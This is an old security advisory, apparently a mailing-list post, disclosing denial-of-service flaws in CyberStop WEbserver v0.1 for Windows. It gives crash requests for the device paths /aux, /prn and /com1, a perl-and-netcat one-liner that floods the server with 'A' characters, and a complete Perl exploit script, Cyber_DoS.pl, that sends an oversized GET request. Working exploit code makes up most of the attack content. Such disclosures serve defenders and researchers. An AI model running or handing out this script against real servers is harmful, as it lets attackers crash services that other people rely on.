Details on document attached. /Alex Hernandez! ________________________________________________ Get your own "800" number Voicemail, fax, email, and a lot more http://www.ureach.com/reg/tag
------oOo------ CyberStop WEbserver DoS Remote attacks. ------oOo------ CyberStop WEbserver for Windows 9x/NT/2000 contains remote vulnerabilities which allow users to attack remote services on the server. Exploit information included. Company Affected: www.cyberstop.com.sg Download: http://www.cyberstop.com.sg/webserver/webserver.zip Version: v0.1 Date Added: 12-DIC-01 Size: 2.84 MB OS Affected: Windows ALL. Author: ** Alex Hernandez <al3xhernandez@ureach.com> ** Thanks all the people from Spain and Argentina. ** Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins ** G.Maggiotti & H.Oliveira. ----=[Brief Description]=------------ DoS A Denial of Service attack can be caused in the product by issuing the following request: http://www.example.com/aux http://www.example.com/prn http://www.example.com/com1 Also to send a long 'A^s' command to the server, resulting in the server crashing. ----=[Summary]=---------------------- CyberStop WEbserver for Windows is a powerful Webserver software. It can transform a normal pc into a very powerful server, It is easily done by just clicking the html file and view your website in the worldwide web, but exist remotes attacks on server very dangerous. ------oOo------ Proof Of concept # uname -a SunOS Lab 5.8 Generic_108528-03 sun4u sparc SUNW,Ultra-5_10 # # perl -e ' for ($i=1;$i<2049;$i++) { print "A";} ' | nc 10.0.0.1 80 # Exist a service named "Proyect1" and may be u can reading something like this on Windows Server: "Run-time error 40006": Wrong protocol or connection state for the request transaction or request. "Run-time error "5": Invalid procedure call or argument. Crash system and the admin need restart the service!. sh-2.04# nc -vvn 10.0.0.1 80 (UNKNOWN) [10.0.0.1] 80 (?) open GET /aux HTTP/1.0 sh-2.04# Some ports like mouse and printers on server crash and the admin need restart the service!. ------oOo------------- Exploit Code DoS Cyber_DoS.pl ------oOo------------- #!/usr/bin/perl # Simple script to send a long 'A^s' command to the server, # resulting in the server crashing. # # CyberStop WEbserver v0.1 proof-of-concept exploit # By Alex Hernandez <al3xhernandez@ureach.com> (C)2002. # # Thanks all the people from Spain and Argentina. # Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins, # G.Maggiotti & H.Oliveira. # # # Usage: perl -x Cyber_DoS.pl -s <server> # # Example: # # perl -x Cyber_DoS.pl -s 10.0.0.1 # # Crash was successful ! # use Getopt::Std; use IO::Socket; print("\nCyberStop WEbserver v0.1 DoS exploit (c)2002.\n"); print("Alex Hernandez al3xhernandez\@ureach.com\n\n"); getopts('s:', \%args); if(!defined($args{s})){&usage;} ($serv,$port,$def,$num,$data,$buf,$in_addr,$paddr,$proto); $def = "A"; $num = "3000"; $data .= $def x $num; $serv = $args{s}; $port = 80; $buf = "GET /$data /HTTP/1.0\r\n\r\n"; $in_addr = (gethostbyname($serv))[4] || die("Error: $!\n"); $paddr = sockaddr_in($port, $in_addr) || die ("Error: $!\n"); $proto = getprotobyname('tcp') || die("Error: $!\n"); socket(S, PF_INET, SOCK_STREAM, $proto) || die("Error: $!"); connect(S, $paddr) ||die ("Error: $!"); select(S); $| = 1; select(STDOUT); print S "$buf"; print("\nCrash was successful !\n\n"); sub usage {die("\n\nUsage: perl -x $0 -s <server>\n\n");} ------oOo------------------------------------ Vendor Response: The vendor was notified help@cyberstopasia.com http://www.cyberstop.com.sg Patch Temporary: No Data of vendor. Alex Hernandez <al3xhernandez@ureach.com> (c) 2002. ------oOo------------------------------------
